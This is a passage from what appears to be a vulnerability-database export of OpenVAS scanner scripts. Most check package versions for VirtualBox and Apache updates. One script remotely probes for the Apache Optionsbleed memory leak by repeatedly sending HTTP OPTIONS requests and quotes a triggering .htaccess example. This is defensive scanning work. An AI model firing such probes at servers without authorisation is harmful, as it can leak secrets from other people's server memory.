script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 07:20:54 +0200 (Mon, 27 Aug 2018)\");\n script_cve_id(\"CVE-2017-5715\", \"CVE-2018-0739\", \"CVE-2018-2676\", \"CVE-2018-2685\", \"CVE-2018-2686\", \"CVE-2018-2687\", \"CVE-2018-2688\", \"CVE-2018-2689\", \"CVE-2018-2690\", \"CVE-2018-2693\", \"CVE-2018-2694\", \"CVE-2018-2698\", \"CVE-2018-2830\", \"CVE-2018-2831\", \"CVE-2018-2835\", \"CVE-2018-2836\", \"CVE-2018-2837\", \"CVE-2018-2842\", \"CVE-2018-2843\", \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2860\", \"CVE-2018-3005\", \"CVE-2018-3055\", \"CVE-2018-3085\", \"CVE-2018-3086\", \"CVE-2018-3087\", 
\"CVE-2018-3088\", \"CVE-2018-3089\", \"CVE-2018-3090\", \"CVE-2018-3091\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kbuild (openSUSE-SU-2018:2524-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kbuild'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for kbuild, virtualbox fixes the following issues:\n\n kbuild changes:\n\n - Update to version 0.1.9998svn3110\n\n - Do not assume glibc glob internals\n\n - Support GLIBC glob interface version 2\n\n - Fix build failure (boo#1079838)\n\n - Fix build with GCC7 (boo#1039375)\n\n - Fix build by disabling vboxvideo_drv.so\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3\n\n zypper in -t patch openSUSE-2018-938=1\");\n\n script_tag(name:\"affected\", value:\"kbuild, on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2524-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-08/msg00080.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"kbuild\", rpm:\"kbuild~0.1.9998svn3110~4.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kbuild-debuginfo\", rpm:\"kbuild-debuginfo~0.1.9998svn3110~4.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kbuild-debugsource\", rpm:\"kbuild-debugsource~0.1.9998svn3110~4.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debuginfo\", rpm:\"virtualbox-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~5.2.18_k4.4.143_65~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~5.2.18_k4.4.143_65~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~5.2.18_k4.4.143_65~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~5.2.18_k4.4.143_65~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-vnc\", rpm:\"virtualbox-vnc~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-desktop-icons\", rpm:\"virtualbox-guest-desktop-icons~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"virtualbox-guest-source\", rpm:\"virtualbox-guest-source~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-source\", rpm:\"virtualbox-host-source~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-09-20T00:00:00", "id": "OPENVAS:1361412562310843313", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843313", "type": "openvas", "title": "Ubuntu Update for apache2 USN-3425-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3425_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for apache2 USN-3425-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843313\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 11:45:15 +0200 (Wed, 20 Sep 2017)\");\n script_cve_id(\"CVE-2017-9798\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for apache2 USN-3425-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Hanno Böck discovered that the Apache HTTP\n Server incorrectly handled Limit directives in .htaccess files. In certain\n configurations, a remote attacker could possibly use this issue to read\n arbitrary server memory, including sensitive information. 
This issue is known as\n Optionsbleed.\");\n script_tag(name:\"affected\", value:\"apache2 on Ubuntu 17.04,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3425-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3425-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.7-1ubuntu4.18\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.25-3ubuntu2.3\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.18-2ubuntu3.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-08T18:58:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "description": "Apache HTTP server allows remote attackers to read secret data\n from process memory if the Limit directive can be set in a user", "modified": 
"2020-05-06T00:00:00", "published": "2017-09-20T00:00:00", "id": "OPENVAS:1361412562310112048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112048", "type": "openvas", "title": "Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:http_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112048\");\n script_version(\"2020-05-06T12:58:00+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 12:58:00 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 12:53:35 +0200 (Wed, 20 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2017-9798\");\n script_bugtraq_id(100872);\n script_name(\"Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache/installed\");\n\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2017/09/18/2\");\n script_xref(name:\"URL\", value:\"https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/100872\");\n script_xref(name:\"URL\", value:\"https://archive.apache.org/dist/httpd/patches/apply_to_2.2.34/\");\n script_xref(name:\"URL\", value:\"https://www.apache.org/dist/httpd/CHANGES_2.4.28\");\n\n script_tag(name:\"summary\", value:\"Apache HTTP server allows remote attackers to read secret data\n from process memory if the Limit directive can be 
set in a user's .htaccess file, or if httpd.conf\n has certain misconfigurations, aka Optionsbleed.\");\n\n script_tag(name:\"vuldetect\", value:\"This script checks for a corrupted Allow header that is being\n constructed in response to HTTP OPTIONS requests.\");\n\n script_tag(name:\"insight\", value:\"Optionsbleed is a use after free error in Apache HTTP server that\n causes a corrupted Allow header to be constructed in response to HTTP OPTIONS requests. This can leak\n pieces of arbitrary memory from the server process that may contain secrets. The memory pieces change\n after multiple requests, so for a vulnerable host an arbitrary number of memory chunks can be leaked.\n\n The bug appears if a webmaster tries to use the 'Limit' directive with an invalid HTTP method.\n\n Example .htaccess:\n\n <Limit abcxyz>\n </Limit>\");\n\n script_tag(name:\"impact\", value:\"The successful exploitation allows the attacker to read chunks of the\n host's memory.\");\n\n script_tag(name:\"affected\", value:\"Apache HTTP Server 2.2.x versions up to 2.2.34 and 2.4.x below 2.4.28.\");\n\n script_tag(name:\"solution\", value:\"Update to Apache HTTP Server 2.4.28. For Apache HTTP Server running\n version 2.2.34 apply the patch linked in the references.\n\n As a workaround the usage of .htaccess should be disabled completely via the 'AllowOverride None'\n directive within the webserver's configuration. 
Furthermore all <Limit> statements within the\n webserver configuration needs to be verified for invalid HTTP methods.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nget_app_location(cpe:CPE, port:port, nofork:TRUE); # To have a reference to the Detection-NVT\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:port);\n\n#TODO: Once this vulnerability got older we might want to consider to limit the amounts of directories to check here\nforeach dir(make_list_unique(\"/\", http_cgi_dirs(port:port)))\n{\n\n if(dir == \"/\") dir = \"\";\n url = dir + \"/\";\n\n req = 'OPTIONS ' + url + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Connection: Close\\r\\n\\r\\n';\n\n for(i = 0; i <= 100; i++)\n {\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n if(res =~ \"^HTTP/1\\.[01] 405\" ) break; # We don't need to continue in this inner loop if the OPTIONS method is disabled.\n if(allow = egrep(string:res, pattern:\"^Allow: .*\" ))\n {\n # Examples:\n # Allow: POST,OPTIONS,,HEAD,:09:44 GMT\n # Allow: ,GET,HEAD,POST,OPTIONS\n # Allow: HEAD,,HEAD,POST,,HEAD,TRACE\n # Allow: POST,OPTIONS,GET,HEAD,,HEAD,write.c>\n if(vuln = eregmatch(pattern:\"(\\,{2,}|\\,\\W+\\,|^\\w+\\:[\\s]{0,}\\,|\\d)\", string:allow))\n {\n report = \"The remote service might leak data/memory via the 'Allow' header.\";\n report += '\\n\\nRequest:\\n' + req + '\\nResponse:\\n' + res;\n security_message(port:port, data:report);\n exit(0);\n }\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-29T20:09:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "description": "Hanno Boeck discovered that incorrect parsing of Limit 
directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.", "modified": "2020-01-29T00:00:00", "published": "2018-02-07T00:00:00", "id": "OPENVAS:1361412562310891102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891102", "type": "openvas", "title": "Debian LTS: Security Advisory for apache2 (DLA-1102-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891102\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-9798\");\n script_name(\"Debian LTS: Security Advisory for apache2 (DLA-1102-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00019.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"apache2 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\");\n\n script_tag(name:\"summary\", value:\"Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:34:19", "bulletinFamily": 
"scanner", "cvelist": ["CVE-2017-9798"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171252", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1252)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1252\");\n script_version(\"2020-01-23T11:01:27+0000\");\n script_cve_id(\"CVE-2017-9798\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:01:27 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:01:27 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1252)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1252\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1252\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'httpd' package(s) announced via the EulerOS-SA-2017-1252 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. 
A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "description": "Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.", "modified": "2019-03-18T00:00:00", "published": "2017-09-20T00:00:00", "id": "OPENVAS:1361412562310703980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703980", "type": "openvas", "title": 
